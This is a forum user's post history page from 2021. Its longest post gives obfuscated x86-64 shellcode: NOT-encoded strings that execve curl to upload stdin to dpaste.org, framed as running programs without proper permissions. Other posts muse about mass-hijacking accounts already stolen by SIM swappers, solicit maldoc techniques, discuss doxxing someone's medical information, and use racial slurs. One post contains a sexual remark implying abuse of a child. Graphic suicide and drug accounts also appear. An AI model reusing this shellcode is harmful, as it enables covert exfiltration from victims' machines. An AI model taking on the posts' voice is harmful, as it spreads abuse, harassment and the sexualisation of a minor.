Posts by Sophie
-
2021-07-04 at 4 PM UTC in Building a Distro, that builds Distros | FULL AUTO
-
2021-07-04 at 1:14 AM UTC in Invoking Scripts and Binaries from an Asm program.
-
2021-07-04 at 12:59 AM UTC in Invoking Scripts and Binaries from an Asm program.
So i was looking into ways to execute things on *Nix boxes without necessarily having the appropriate permissions to do so. I know about `execve` and i can leverage it to do something like this:
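```nasm
; x86-64 Linux: execve("////usr/bin/curl", argv, envp), everything built on the stack.
; The argument strings are stored bitwise-inverted and restored with NOT.
global _start
section .text
_start:
    push 59                         ; rax = 59 (execve)
    pop rax
    cdq                             ; rdx = 0
    push rdx                        ; NUL terminator for the path
    mov rbx, 0x6c7275632f6e6962     ; "bin/curl"
    push rbx
    mov rbx, 0x2f7273752f2f2f2f     ; "////usr/"
    push rbx
    push rsp
    pop rdi                         ; rdi -> "////usr/bin/curl"
    push rdx
    mov rbx, 0xffffffffffffb9d2     ; ~"-F"
    not rbx
    push rbx
    push rsp
    pop r8                          ; r8 -> "-F"
    push rdx
    mov rbx, 0xffffffffffff938d     ; ~"rl"
    not rbx
    push rbx
    mov rbx, 0x8ac28b9e928d9099     ; ~"format=u"
    not rbx
    push rbx
    push rsp
    pop r9                          ; r9 -> "format=url"
    push rdx
    mov rbx, 0xffffffffffffb9d2     ; ~"-F"
    not rbx
    push rbx
    push rsp
    pop r10                         ; r10 -> "-F"
    push rdx
    mov rbx, 0xffffffffd8d2c3c2     ; ~"=<-'"
    not rbx
    push rbx
    mov rbx, 0x8b919a8b91909cd8     ; ~"'content"
    not rbx
    push rbx
    push rsp
    pop r11                         ; r11 -> "'content=<-'" (quotes are part of the string)
    push rdx
    mov rbx, 0xffd0968f9ed0988d     ; ~"rg/api/" plus NUL
    not rbx
    push rbx
    mov rbx, 0x90d19a8b8c9e8f9b     ; ~"dpaste.o"
    not rbx
    push rbx
    mov rbx, 0xd0d0c58c8f8b8b97     ; ~"https://"
    not rbx
    push rbx
    push rsp
    pop r12                         ; r12 -> "https://dpaste.org/api/"
    push rdx                        ; NULL: terminates argv and serves as the empty envp
    push rsp
    pop rdx                         ; rdx = envp -> { NULL }
    push r12                        ; argv is pushed last element first
    push r11
    push r10
    push r9
    push r8
    push rdi
    push rsp
    pop rsi                         ; rsi = argv
    syscall                         ; execve(rdi, rsi, rdx)
```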
And that's fine. But `execve` is a one off. At least as far as i understand it. And at least as far as it is used in my example above.
So i started reading, and i read you could start a shell script with environment variables from your Asm program which was pretty cool. Something like this.
```nasm
bits 64
; The multi-argument "syscall" macro and the names fork, write, wait4, execve,
; exit and stderr used below are not plain NASM; they come from this include,
; which is not shown here.
[list -]
    %include "unistd.inc"
[list +]

section .data
    filename:       db  "test.sh",0
    .len:           equ $-filename
    ;... put more arguments here
    envp1:          db  "TESTVAR=123456",0
    ;... put more environment parameters here
    argvPtr:        dq  filename
    ; more pointers to arguments here
                    dq  0               ; terminate the list of pointers with 0
    envPtr:         dq  envp1
                    dq  0
    forkerror:      db  "fork error",10
    .len:           equ $-forkerror
    execveerror:    db  "execve error(not expected)",10
    .len:           equ $-execveerror
    wait4error:     db  "wait4 error",10
    .len:           equ $-wait4error

section .text
    global _start
_start:
    syscall fork
    and     rax,rax                     ; set flags from fork's return value
    jns     .continue                   ; negative: fork failed
    syscall write,stderr,forkerror,forkerror.len
    jmp     .exit
.continue:
    jz      .runchild                   ; zero: this is the child
    ; wait for child to terminate
    syscall wait4, 0, 0, 0, 0
    jns     .exit
    syscall write,stderr,wait4error,wait4error.len
    jmp     .exit
.runchild:
    syscall execve,filename,argvPtr,envPtr
    jns     .exit
    syscall write,stderr,execveerror,execveerror.len
.exit:
    syscall exit,0
```
But then i came across an example that kind of blew my mind. I'll post it below in spoiler tags because it's long. But basically they're starting a terminal and from the program are having the commands they define be executed in that terminal. So does that mean i can basically just write a shell script within an Asm program, invoke a terminal and execute whatever i want?
Thoughts?
-
2021-07-02 at 3:05 AM UTC in God hacked my phone
No i didn't.
-
2021-07-02 at 1:37 AM UTC in I just took a pic of the Ukrainian chick
-
2021-07-02 at 12:28 AM UTC in 3 for 20
-
2021-07-02 at 12:26 AM UTC in Old Nigga Most Likely to Die Next-Death Pool/Gambling
-
2021-07-02 at 12:24 AM UTC in I got Sim-Swap!
Originally posted by SBTlauien Yeah I essentially hacked the phone number back. The day after this happened, I got a couple of SMS messages from my new carrier that had OTP. That was the perp trying to access the account and probably trying to figure out why there was a password on the account.
The sim-swappers are likely making a killing.
I'm still wanting to know what they did to change my PIN. I'm guessing they called and said "I'm an employee at the Boost Mobile store and I need to locate a receipt. Can you give me the activation date so I can look up the receipt?" I bet the phone Rep gave it out.
Makes me wonder how they came across my phone number and email as well.
Others on Reddit also had this happen and the PIN on the accounts were all "13371337"…
I feel like there should be a way to harvest accounts that have been messed with en masse and just enter double l33t to activate and then steal the stolen stuff from the stealers in an epic cyber uno reverse on a mass scale.
-
2021-07-02 at 12:14 AM UTC in element.io
-
2021-07-02 at 12:05 AM UTC in 3 for 20
-
2021-07-02 at 12 AM UTC in I uncovered Paul Wozny AKA Quick Mix Ready 's medical informationIf you're uncomfortable with 'little' you can ask me how little and i will give you a compromise number.
-
2021-07-01 at 11:58 PM UTC in Serious Question. Why is everyone here so mean?
-
2021-07-01 at 11:55 PM UTC in I uncovered Paul Wozny AKA Quick Mix Ready 's medical information
Originally posted by Bradley Mostly just wanna fist fight him in person because he said he's a golden gloves boxer or some shit and he's already double my highest (ever) weight so I figure if he can pack a punch like he can pack his ass, it'd be fun to pop out and surprise him.
It's okay though Sophia, my friends have hooked me up. Do you wanna hook up one of these days? I won't tell your girlfriend/s
The only way we'll ever be any sort of vaguely sexual situation together is if you fly me out to wherever, where you have a sweet little girl for me ready in a room in the same building you will be in. And then you can go fuck her father while i entertain his daughter. The room can even be adjacent to mine, if you keep it down. -
2021-07-01 at 11:42 PM UTC in Serious Question. Why is everyone here so mean?
I'm generally nice as long as other people are nice to me.
-
2021-07-01 at 11:28 PM UTC in I uncovered Paul Wozny AKA Quick Mix Ready 's medical information10 bucks is chump change nigga. Also, why you wanna DOX QMR?
-
2021-07-01 at 11 PM UTC in I just took a pic of the Ukrainian chick
-
2021-07-01 at 10:58 PM UTC in How did that fucktard Bill Krozby die?
Originally posted by Bradley To answer your question; after doing large amounts of methamphetamene (code named "tek") he convinced himself Austin Police Department was outside with a dog and a raid was incoming, and tortilla-style blocked off his doorway, in a delerium he decided "Fuck BradleyB and everyone else who cares about me" and decided to use a kitchen knife to open himself up in the wrist and stomach, at some point he decided "Wow this really hurts and I might die" and attempted to undo some of the barricade. There were two pools of blood, one located at the door barricade & one located next to the bed where he was to my knowledge found dead.
It is what it is. Another dead friend, I took it really badly and started drinking again (not because of Bill Krozby but because I wanted to) then got "sober" where I smoked an eighth, did half a dab cart, and a quarter gram of speed a day.
I even had a minor freak out where i incorrectly convinced myself that my roommate had someone over and was colluding to kill me. So I did what any reasonable person does when expecting to meet death on his own terms, I beat on her door until she answered and then barehanded sought to fight my oppositional adversary. Unfortunately it was just her, and I apologized, did two ambien and went to sleep.
But we're not all as cool as I am.
RIP Kr0zd0g, I knew you'd never work.
Jesus. That's a fucked up way to go. If the police were after me and i somehow got the idea in my head to rather die than go to prism i'd probably try to suicide by cop. -
2021-06-25 at 12:06 AM UTC in All the popular minecraft servers have been taken down by @TheTalkingBear
When i still used Twitter i followed a couple people like TheTalkingBear mostly for the drama, it's mildly amusing but they're mostly just obnoxious. Plus, back then i liked keeping up with all the little 'hacking crews' that wanted to be the new LulzSec. Instead of actually hacking stuff they'd mostly fight among each other. The most amount of 'hacking' that would occur was the occasional DDoS or DB Drop.
-
2021-06-24 at 11:50 PM UTC in What kind of Space Ship would niggasin be?
-
2021-06-24 at 11:38 PM UTC in I got Sim-Swap!
Oh i read that wrong. The cum swapper set double l33t as password to activate the number on his end.
Lol he got BTFO'd.
That said, i am still open to receiving any cool MalDoc TTPs should you have some.